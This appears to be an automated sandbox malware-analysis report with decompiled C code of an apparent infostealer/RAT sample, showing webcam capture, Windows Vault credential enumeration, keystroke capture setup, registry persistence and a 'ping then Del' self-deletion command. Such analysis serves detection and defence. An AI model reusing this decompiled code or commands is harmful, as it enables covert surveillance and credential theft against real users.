					if(_t118 != 0) {
						_t63 =  *((intOrPtr*)( *_t118 + 8))(_t118);
					}
					if(_t89 != 0) {
						_t63 =  *((intOrPtr*)( *_t89 + 8))(_t89);
					}
					__imp__CoUninitialize();
					return _t63;
				}
				_t63 =  *((intOrPtr*)( *_t91))(_t91, 0x412360,  &_v16);
				_t96 = _v16;
				if(_t96 == 0) {
					goto L8;
				}
				 *((intOrPtr*)( *_t96 + 4))(_t96);
				_t63 = E00410180(_a4,  &_v12);
				if(_v12 == 0) {
					goto L10;
				}
				_t63 =  *_t115(0x4123d0, 0, 1, 0x414684,  &_v20);
				_t98 = _v20;
				if(_t98 != 0) {
					 *((intOrPtr*)( *_t98 + 0xc))(_t98, _v12, L"Source");
					_t76 = _v20;
					 *((intOrPtr*)( *_t76 + 0xc))(_t76, _v16, L"Grabber");
					E00401052( &_v144, 0, 0x48);
					_t80 = _v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_t80 + 0x10))(_t80,  &_v144);
					_t63 = E0040FD9D();
					_t118 = _t63;
					if(_t118 != 0) {
						_t63 = E0040FDB9();
						_t89 = _t63;
						if(_t89 != 0) {
							_t103 = _v20;
							_t63 =  *((intOrPtr*)( *_t103 + 0x2c))(_t103, _t118, _t89);
							if(_t63 >= 0) {
								_t82 = _v24;
								 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v216);
								_t105 = _v148;
								_t113 = _v148 + 0x30;
								E0040102C(_t121 + _v148 + 0x30 - _t105 - 0x74, _v148 + 0x30, 0x28);
								E0040FC00( &_v216);
								_t63 = E0041023F(_v28, _t113, _a4, _v64, _v68, _v58);
							}
						}
					}
				}
				goto L8;
			}

0x0040fe5d
0x0040fe61
0x0040fe6a
0x0040fe76
0x0040fe79
0x0040fe7b
0x0040fe7e
0x0040fe80
0x0040fe83
0x0040fe8e
0x0040fe90
0x0040fe95
0x0040ffbf
0x0040ffbf
0x0040ffc4
0x0040ffc9
0x0040ffcc
0x0040ffcc
0x0040ffd0
0x0040ffd0
0x0040ffd5
0x0040ffda
0x0040ffdd
0x0040ffdd
0x0040ffe1
0x0040ffe6
0x0040ffeb
0x0040ffee
0x0040ffee
0x0040fff2
0x0040fff7
0x0040fffc
0x0040ffff
0x0040ffff
0x00410005
0x0041000a
0x0041000a
0x0041000f
0x00410014
0x00410014
0x00410017
0x00410021
0x00410021
0x0040fea7
0x0040fea9
0x0040feae
0x00000000
0x00000000
0x0040feb7
0x0040fec0
0x0040fec8
0x00000000
0x00000000
0x0040fedf
0x0040fee1
0x0040fee6
0x0040fef7
0x0040fefa
0x0040ff08
0x0040ff15
0x0040ff1f
0x0040ff31
0x0040ff34
0x0040ff35
0x0040ff36
0x0040ff3f
0x0040ff40
0x0040ff41
0x0040ff42
0x0040ff45
0x0040ff4b
0x0040ff50
0x0040ff54
0x0040ff59
0x0040ff5e
0x0040ff62
0x0040ff64
0x0040ff6c
0x0040ff71
0x0040ff73
0x0040ff80
0x0040ff83
0x0040ff8b
0x0040ff98
0x0040ffa6
0x0040ffba
0x0040ffba
0x0040ff71
0x0040ff62
0x0040ff54
0x00000000

APIs

CoInitialize.OLE32(00000000), ref: 0040FE61
CoCreateInstance.OLE32(00412380,00000000,00000001,00414694,0040F990), ref: 0040FE8E
CoUninitialize.OLE32 ref: 00410017

Part of subcall function 00410180: CoCreateInstance.OLE32(004123C0,00000000,00000001,00414674,?), ref: 004101AE

CoCreateInstance.OLE32(004123D0,00000000,00000001,00414684,?), ref: 0040FEDF

Part of subcall function 0040FC00: CoTaskMemFree.OLE32(?), ref: 0040FC0E

Strings

Grabber, xrefs: 0040FEFD
Source, xrefs: 0040FEEE
vids, xrefs: 0040FF1A

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CreateInstance$FreeInitializeTaskUninitialize
String ID: Grabber$Source$vids
API String ID: 533512943-4200688928
Opcode ID: 5a671baa9c1524d00839a0b9fd338d9f76540ae48f3672b580aed8eba955ea8c
Instruction ID: f1388459a11edadffb113e40ffdd4e30d96e7318b79d066ff901b9b48ceb7778
Opcode Fuzzy Hash: 5a671baa9c1524d00839a0b9fd338d9f76540ae48f3672b580aed8eba955ea8c
Instruction Fuzzy Hash: 6B515D71A00209AFDB14DFA5C884EAEB7B9FF45305F14407EF915AB2A0CBB99D44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004027D9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108
processthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004027D9() {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				char _v352;
				char _v816;
				char _v817;
				char _v872;
				void* _t63;
				void* _t70;
				void* _t73;

				_t63 = _t70;
				_t73 = _t63;
				E0040EA1C(_t73 + 0x10);
				if( *((intOrPtr*)(_t73 + 0x68)) != 0) {
					TerminateThread( *0x4167b4, 0);
				}
				if( *((intOrPtr*)(_t73 + 0x50)) != 0) {
					E0040EB4B(_t73 + 4,  *((intOrPtr*)(_t73 + 8)), _t73 + 0x14, 0x20006, 0);
					E004033F3( &_v8, _t73 + 0x54);
					E0040EA37(_t73 + 4,  &_v8);
					E004058FB(_v8);
					E0040EA99(_t73 + 4);
				}
				E00401052( &_v92, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetModuleFileNameA(0,  &_v352, 0x104);
				E0040102C( &_v872, "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q ", 0x37);
				E0040102C( &_v817, "\"", 1);
				E0040102C( &_v816,  &_v352, E004010D5( &_v352));
				E0040102C(E004010D5( &_v352) + 0x38 +  &_v872, "\"", 2);
				CreateProcessA(0,  &_v872, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
				CloseHandle(_v24.hThread);
				CloseHandle(_v24);
				ExitProcess(0);
			}

0x004027d9
0x0040f02c
0x0040f031
0x0040f03b
0x0040f044
0x0040f044
0x0040f04d
0x0040f061
0x0040f06d
0x0040f078
0x0040f080
0x0040f087
0x0040f087
0x0040f093
0x0040f09d
0x0040f0a1
0x0040f0a7
0x0040f0a8
0x0040f0b1
0x0040f0c5
0x0040f0d9
0x0040f0f9
0x0040f119
0x0040f13b
0x0040f14a
0x0040f14f
0x0040f152

APIs

Part of subcall function 0040EA1C: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 0040EA23

TerminateThread.KERNEL32(00000000,?,?), ref: 0040F044
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 0040F0B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040F13B
CloseHandle.KERNEL32(?), ref: 0040F14A
CloseHandle.KERNEL32(?), ref: 0040F14F
ExitProcess.KERNEL32 ref: 0040F152

Strings

cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 0040F0BF

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
String ID: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
API String ID: 3630425516-84290196
Opcode ID: 522f34c8e66ef0154c38e8d9f6267e96b0d3810cd2072919aa6d456e6e235132
Instruction ID: ea1cf96152815c588e947313fc2c57a60d8bf755887a985f2d57d94b4dc982fd
Opcode Fuzzy Hash: 522f34c8e66ef0154c38e8d9f6267e96b0d3810cd2072919aa6d456e6e235132
Instruction Fuzzy Hash: BD316FB2900618BBDB11EBA1CD86EDFB77DEB08304F404476B605A2591DB78AE54CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A06B Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 54
libraryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040A06B(void* __ecx) {
				struct HINSTANCE__* _t17;
				intOrPtr _t21;
				intOrPtr _t24;
				void* _t27;
				void* _t45;

				_t27 = __ecx;
				_t45 = __ecx;
				_t17 = LoadLibraryA("vaultcli.dll");
				 *(_t45 + 0xb8) = _t17;
				_t46 = _t17;
				if(_t17 == 0) {
					L7:
					__eflags = 0;
					return 0;
				} else {
					_push(_t27);
					 *((intOrPtr*)(_t45 + 0x84)) = E0040E579(_t17, "VaultOpenVault", _t46);
					 *((intOrPtr*)(_t45 + 0x88)) = E0040E579( *(_t45 + 0xb8), "VaultCloseVault", _t46);
					_t21 = E0040E579( *(_t45 + 0xb8), "VaultEnumerateItems", _t46);
					_t43 = "VaultGetItem";
					 *((intOrPtr*)(_t45 + 0x8c)) = _t21;
					 *((intOrPtr*)(_t45 + 0x90)) = E0040E579( *(_t45 + 0xb8), "VaultGetItem", _t46);
					 *((intOrPtr*)(_t45 + 0x94)) = E0040E579( *(_t45 + 0xb8), _t43, _t46);
					_t24 = E0040E579( *(_t45 + 0xb8), "VaultFree", _t46);
					 *((intOrPtr*)(_t45 + 0x98)) = _t24;
					if( *((intOrPtr*)(_t45 + 0x84)) == 0 ||  *((intOrPtr*)(_t45 + 0x8c)) == 0 ||  *((intOrPtr*)(_t45 + 0x88)) == 0 ||  *((intOrPtr*)(_t45 + 0x90)) == 0 || _t24 == 0) {
						goto L7;
					} else {
						return 1;
					}
				}
			}

0x0040a06b
0x0040a071
0x0040a073
0x0040a079
0x0040a07f
0x0040a081
0x0040a135
0x0040a135
0x0040a138
0x0040a087
0x0040a088
0x0040a0a0
0x0040a0b6
0x0040a0bc
0x0040a0c7
0x0040a0ce
0x0040a0e1
0x0040a0f7
0x0040a0fd
0x0040a105
0x0040a112
0x00000000
0x0040a130
0x0040a134
0x0040a134
0x0040a112

APIs

LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040A073

Part of subcall function 0040E579: lstrcmpA.KERNEL32(?,?,?,0040A3BD,?,?,00000104,00000000), ref: 0040E5B2

Strings

VaultFree, xrefs: 0040A0F2
VaultCloseVault, xrefs: 0040A09B
VaultEnumerateItems, xrefs: 0040A0B1
VaultGetItem, xrefs: 0040A0C7
vaultcli.dll, xrefs: 0040A06C
VaultOpenVault, xrefs: 0040A089

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: LibraryLoadlstrcmp
String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2493137890-3967309459
Opcode ID: d440007b886b91f492dd60ac605478f67e3e3370c0f7fc5f51ea2ac71965d388
Instruction ID: 9c86c6a071819a6218a29dbcc43a7c44502138cc7b44748e8cde21c07d479f95
Opcode Fuzzy Hash: d440007b886b91f492dd60ac605478f67e3e3370c0f7fc5f51ea2ac71965d388
Instruction Fuzzy Hash: 51111C31A007018FCB649A72A415797B6A6AB84314F108C3FA0EED7390DF38A8A1CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1EC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F1EC(void* __ecx) {
				void* _v8;
				int _v12;
				short* _t16;

				_t16 = L"SOFTWARE\\_rptls";
				if(RegOpenKeyExW(0x80000001, _t16, 0, 0xf003f,  &_v8) != 0) {
					RegCreateKeyExW(0x80000001, _t16, 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12);
				}
				RegSetValueExW(_v8, L"Install", 0, 1, 0x4168c0, lstrlenW(0x4168c0) << 2);
				return RegCloseKey(_v8);
			}

0x0040f200
0x0040f214
0x0040f229
0x0040f229
0x0040f24b
0x0040f25e

APIs

RegOpenKeyExW.ADVAPI32 ref: 0040F20C
RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 0040F229
lstrlenW.KERNEL32(004168C0,?,?,?,0040F291,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F235
RegSetValueExW.ADVAPI32 ref: 0040F24B
RegCloseKey.ADVAPI32(?), ref: 0040F254

Strings

Install, xrefs: 0040F243
SOFTWARE\_rptls, xrefs: 0040F200, 0040F206, 0040F223

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenValuelstrlen
String ID: Install$SOFTWARE\_rptls
API String ID: 2036214137-3226779556
Opcode ID: 0ddf7a4f710da00c4fb83adf41258a61bdaa5fa94982a9deb14dfa4387708b59
Instruction ID: 34e325bec679b2a6ac2b72ecd605b8b4e35f20e9be9a6099366f3d433d2abdbc
Opcode Fuzzy Hash: 0ddf7a4f710da00c4fb83adf41258a61bdaa5fa94982a9deb14dfa4387708b59
Instruction Fuzzy Hash: E3F0AF71600018BFE7215B86DD4DEEB7F7CEBCA790B00417ABA05E1011D7A15F54C6B8

Uniqueness

Uniqueness Score: -1.00%

Function 0040F25F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040F25F(void* __ecx, void* __eflags) {
				long _t2;
				void* _t6;
				void* _t11;
				struct HRSRC__* _t14;

				_t11 = __ecx;
				E00401052(0x4168c0, 0, 0x208);
				_t2 = GetModuleFileNameW(0, 0x4168c0, 0x208);
				__imp__#680();
				if(_t2 == 0) {
					E0040F1EC(_t11);
					_t14 = FindResourceW(0, 0x66, L"WM_DSP");
					_t6 = LoadResource(0, _t14);
					SizeofResource(0, _t14);
					E0040F159(LockResource(_t6));
				}
				return 0;
			}

0x0040f25f
0x0040f271
0x0040f27c
0x0040f282
0x0040f28a
0x0040f28c
0x0040f29f
0x0040f2a3
0x0040f2ad
0x0040f2bc
0x0040f2bc
0x0040f2c6

APIs

GetModuleFileNameW.KERNEL32(00000000,004168C0,00000208,000000FE,?,?,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F27C
IsUserAnAdmin.SHELL32 ref: 0040F282

Part of subcall function 0040F1EC: RegOpenKeyExW.ADVAPI32 ref: 0040F20C
Part of subcall function 0040F1EC: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 0040F229
Part of subcall function 0040F1EC: lstrlenW.KERNEL32(004168C0,?,?,?,0040F291,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F235
Part of subcall function 0040F1EC: RegSetValueExW.ADVAPI32 ref: 0040F24B
Part of subcall function 0040F1EC: RegCloseKey.ADVAPI32(?), ref: 0040F254

FindResourceW.KERNEL32(00000000,00000066,WM_DSP,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 0040F299
LoadResource.KERNEL32(00000000,00000000,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 0040F2A3
SizeofResource.KERNEL32(00000000,00000000,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 0040F2AD
LockResource.KERNEL32(00000000,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 0040F2B4

Part of subcall function 0040F159: VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,00000000,00000000,?,0040F2C1,?,?,00405268,?,?,000000FE), ref: 0040F197
Part of subcall function 0040F159: VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F1AB
Part of subcall function 0040F159: GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F1B9
Part of subcall function 0040F159: lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F1C7

Strings

WM_DSP, xrefs: 0040F291

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Resource$Virtuallstrlen$AdminAllocCloseCreateDirectoryFileFindLoadLockModuleNameOpenProtectSizeofUserValueWindows
String ID: WM_DSP
API String ID: 2384039076-506093727
Opcode ID: 8852693b62ad9acbd12ae839921cef76b17fafc36f55b62f720ebef59d03c0a2
Instruction ID: d24d02549f6e3768f6ca935ec8fa963fb89bf1d940adbb3100ed89617e633398
Opcode Fuzzy Hash: 8852693b62ad9acbd12ae839921cef76b17fafc36f55b62f720ebef59d03c0a2
Instruction Fuzzy Hash: BEF08271600250BBD3203B72AD8DD9B2FACEFC6755715403AF606E2192DAB88D1586BD

Uniqueness

Uniqueness Score: -1.00%

Function 004056F9 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004056F9(void* __ecx) {
				_Unknown_base(*)()* _t2;
				void* _t4;

				_t4 = __ecx;
				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
				if(_t4 == 0) {
					if(_t2 != 0) {
						_t2 =  *_t2(0, "An assertion condition failed", "Assert", 0x2010);
					}
					ExitProcess(1);
				}
				return _t2;
			}

0x004056ff
0x0040570d
0x00405716
0x0040571a
0x0040572d
0x0040572d
0x00405731
0x00405731
0x00405737

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 00405701
GetProcAddress.KERNEL32(00000000,MessageBoxA,?,00000000,?,?,?,?,?,?,?,004054EA,?,00000000,.bss,00000000), ref: 0040570D
ExitProcess.KERNEL32 ref: 00405731

Strings

USER32.DLL, xrefs: 004056FA
An assertion condition failed, xrefs: 00405726
Assert, xrefs: 00405721
MessageBoxA, xrefs: 00405707

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: AddressExitLibraryLoadProcProcess
String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
API String ID: 881411216-1361702557
Opcode ID: 6985b899cce19f37c5b650aa7753ead7e8c59fc871d0999e705d66fd0f28a6e7
Instruction ID: 277339b69ed5042fd311e9be13e92df597cf412fc845d55b725ba16bf364ea8c
Opcode Fuzzy Hash: 6985b899cce19f37c5b650aa7753ead7e8c59fc871d0999e705d66fd0f28a6e7
Instruction Fuzzy Hash: 23D017707C1301BAEA102B706F0ABD72A14AB18B51F204022BA85E61D1C5E984A5CA2C

Uniqueness

Uniqueness Score: -1.00%

Function 004059C0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 14
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004059C0() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
				if(_t2 != 0) {
					 *_t2(0, "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", "PureCall", 0x2010);
				}
				ExitProcess(1);
			}

0x004059d1
0x004059d9
0x004059ec
0x004059ec
0x004059f0

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 004059C5
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004059D1
ExitProcess.KERNEL32 ref: 004059F0

Strings

PureCall, xrefs: 004059E0
USER32.DLL, xrefs: 004059C0
A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 004059E5
MessageBoxA, xrefs: 004059CB

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: AddressExitLibraryLoadProcProcess
String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
API String ID: 881411216-4134947204
Opcode ID: 3883ed54bfb8ba8a998150d75b30605c68fa973c0d456d4eaed15fd6d135e0bf
Instruction ID: e785614744312d4ea1c5ae80ca4ca9c17c7cc8424604ff6d730008a59afba7fd
Opcode Fuzzy Hash: 3883ed54bfb8ba8a998150d75b30605c68fa973c0d456d4eaed15fd6d135e0bf
Instruction Fuzzy Hash: 98D0E9707C0301BBE6506BB16F0FFD72A15AB08F11F214522F695E41D2C9E994F18A3D

Uniqueness

Uniqueness Score: -1.00%

Function 0041041F Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168
comCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041041F(signed int __ecx, signed int _a4) {
				intOrPtr _v38;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v112;
				char _v128;
				intOrPtr _v132;
				char _v200;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr* _t58;
				intOrPtr* _t60;
				intOrPtr* _t71;
				signed int _t76;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t85;
				signed int _t91;
				intOrPtr* _t96;
				intOrPtr* _t97;
				intOrPtr* _t104;
				signed int _t107;
				intOrPtr* _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				intOrPtr* _t118;
				void* _t119;
				void* _t120;
				void* _t121;

				_t76 = __ecx;
				__imp__CoInitialize(0);
				_t1 = _t76 + 0x18; // 0x8b52f0
				_t111 = _t1;
				__imp__CoCreateInstance(0x412380, 0, 1, 0x414694, _t111);
				_t78 =  *_t111;
				if(_t78 != 0) {
					_t2 = _t76 + 0x1c; // 0x8b52f4
					_t104 = _t2;
					_t49 =  *((intOrPtr*)( *_t78))(_t78, 0x412360, _t104);
					_t79 =  *_t104;
					if(_t79 != 0) {
						_t49 =  *((intOrPtr*)( *_t79 + 4))(_t79);
						_t4 = _t76 + 0x20; // 0x8b52f8
						_t112 = _t4;
						if(_t112 != 0) {
							_t49 = E00410180(_a4, _t112);
						}
						if( *_t112 != 0) {
							_t6 = _t76 + 0x24; // 0x8b52fc
							_t113 = _t6;
							__imp__CoCreateInstance(0x4123d0, 0, 1, 0x414684, _t113);
							_t80 =  *_t113;
							if(_t80 != 0) {
								 *((intOrPtr*)( *_t80 + 0xc))(_t80,  *((intOrPtr*)(_t76 + 0x20)), L"Source");
								_t54 =  *_t113;
								 *((intOrPtr*)( *_t54 + 0xc))(_t54,  *_t104, L"Grabber");
								E00401052( &_v128, 0, 0x48);
								_t58 =  *((intOrPtr*)(_t76 + 0x18));
								_t121 = _t120 + 0xc;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								 *((intOrPtr*)( *_t58 + 0x10))(_t58,  &_v128);
								_t49 = E0040FD9D();
								 *((intOrPtr*)(_t76 + 0x28)) = _t49;
								if(_t49 != 0) {
									_t49 = E0040FDB9();
									 *((intOrPtr*)(_t76 + 0x2c)) = _t49;
									if(_t49 != 0) {
										_t85 =  *((intOrPtr*)(_t76 + 0x24));
										_t49 =  *((intOrPtr*)( *_t85 + 0x2c))(_t85,  *((intOrPtr*)(_t76 + 0x28)), _t49);
										if(_t49 >= 0) {
											_t60 =  *((intOrPtr*)(_t76 + 0x18));
											 *((intOrPtr*)( *_t60 + 0x14))(_t60,  &_v200);
											E0040102C(_t119 + _v132 + 0x30 - _v132 - 0x60, _v132 + 0x30, 0x28);
											E0040FC00( &_v200);
											_t107 = _a4;
											E0041023F(_t76, _v132 + 0x30, _t107, _v44, _v48, _v38);
											E004056F9(_t76 & 0xffffff00 | _t107 -  *((intOrPtr*)(_t76 + 0xc)) > 0x00000000);
											_t91 = 7;
											memcpy(_t121 + 0xc - 0x1c,  *( *((intOrPtr*)(_t76 + 4)) + _t107 * 4), _t91 << 2);
											E0040FCED( *_t76);
											_t49 = E0040FD9D();
											 *((intOrPtr*)(_t76 + 0x30)) = _t49;
											if(_t49 != 0) {
												_t71 =  *((intOrPtr*)(_t76 + 0x18));
												 *((intOrPtr*)( *_t71 + 0x24))(_t71,  *_t76, 0);
												_t96 =  *((intOrPtr*)(_t76 + 0x24));
												_t47 = _t76 + 0x34; // 0x8b530c
												_t118 = _t47;
												_t49 =  *((intOrPtr*)( *_t96))(_t96, 0x4123a0, _t118);
												_t97 =  *_t118;
												if(_t97 != 0) {
													return  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t49;
			}

0x0041042d
0x0041042f
0x00410435
0x00410435
0x00410447
0x0041044d
0x00410451
0x00410459
0x00410459
0x00410463
0x00410465
0x00410469
0x00410472
0x00410475
0x00410475
0x0041047a
0x00410481
0x00410481
0x00410489
0x0041048f
0x0041048f
0x004104a1
0x004104a7
0x004104ab
0x004104bc
0x004104bf
0x004104cb
0x004104d6
0x004104e0
0x004104e6
0x004104ec
0x004104ef
0x004104f0
0x004104f1
0x004104fa
0x004104fb
0x004104fc
0x004104fd
0x00410500
0x00410506
0x0041050b
0x00410510
0x00410519
0x0041051e
0x00410523
0x00410529
0x00410533
0x00410538
0x0041053e
0x0041054b
0x00410560
0x0041056e
0x00410576
0x00410582
0x0041058d
0x0041059d
0x004105a0
0x004105a4
0x004105ac
0x004105b1
0x004105b6
0x004105b8
0x004105c2
0x004105c5
0x004105c8
0x004105c8
0x004105d4
0x004105d6
0x004105da
0x00000000
0x004105df
0x004105da
0x004105b6
0x00410538
0x00410523
0x00410510
0x004104ab
0x00410489
0x00410469
0x004105e6

APIs

CoInitialize.OLE32(00000000), ref: 0041042F
CoCreateInstance.OLE32(00412380,00000000,00000001,00414694,008B52F0), ref: 00410447
CoCreateInstance.OLE32(004123D0,00000000,00000001,00414684,008B52FC), ref: 004104A1

Part of subcall function 00410180: CoCreateInstance.OLE32(004123C0,00000000,00000001,00414674,?), ref: 004101AE

Strings

Grabber, xrefs: 004104C1
Source, xrefs: 004104B3
vids, xrefs: 004104DB

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CreateInstance$Initialize
String ID: Grabber$Source$vids
API String ID: 1108742289-4200688928
Opcode ID: ac87db7589f56d9aab403b51af22a28c7a477f1b998d940f220e485e409256cf
Instruction ID: d5dccdf25cec60d4b88a9396671c5f6553ca50177c3e8da00cbb81949e063f79
Opcode Fuzzy Hash: ac87db7589f56d9aab403b51af22a28c7a477f1b998d940f220e485e409256cf
Instruction Fuzzy Hash: 1B518F71600204AFCB24DF64C885F9A7766BF49704B20446DFD46EF296CBB9E885CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004084CF Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 38
libraryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004084CF() {
				intOrPtr _t1;

				_t1 = 5;
				 *0x4177bc = _t1;
				 *0x416da4 = 0;
				 *0x4177b4 = _t1;
				 *0x4177b8 = 0;
				E00401815(0x4177b0, 0);
				InitializeCriticalSection(0x4177c0);
				E0040D9F6(0x4177ec, 0);
				asm("xorps xmm0, xmm0");
				 *0x4177d8 = 0;
				asm("movups [0x417804], xmm0");
				 *0x4177e8 = 0;
				_t19 = LoadLibraryW(L"User32.dll");
				_push(0x4177ec);
				 *0x4177dc = E0040E579(_t4, "GetRawInputData", 0);
				 *0x4177e4 = E0040E579(_t19, "ToUnicode", 0);
				 *0x4177e0 = E0040E579(_t19, "MapVirtualKeyA", 0);
				return 0x416d98;
			}

0x004084d2
0x004084d5
0x004084df
0x004084e5
0x004084ea
0x004084f0
0x004084fa
0x00408505
0x0040850a
0x0040850d
0x00408518
0x0040851f
0x0040852b
0x00408532
0x0040853f
0x00408550
0x0040855d
0x00408568

APIs

InitializeCriticalSection.KERNEL32(004177C0,?,004011C1), ref: 004084FA
LoadLibraryW.KERNEL32(User32.dll,?,004011C1), ref: 00408525

Part of subcall function 0040E579: lstrcmpA.KERNEL32(?,?,?,0040A3BD,?,?,00000104,00000000), ref: 0040E5B2

Strings

ToUnicode, xrefs: 0040853A
User32.dll, xrefs: 00408513
MapVirtualKeyA, xrefs: 0040854B
GetRawInputData, xrefs: 0040852D

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CriticalInitializeLibraryLoadSectionlstrcmp
String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
API String ID: 4274177235-2474467583
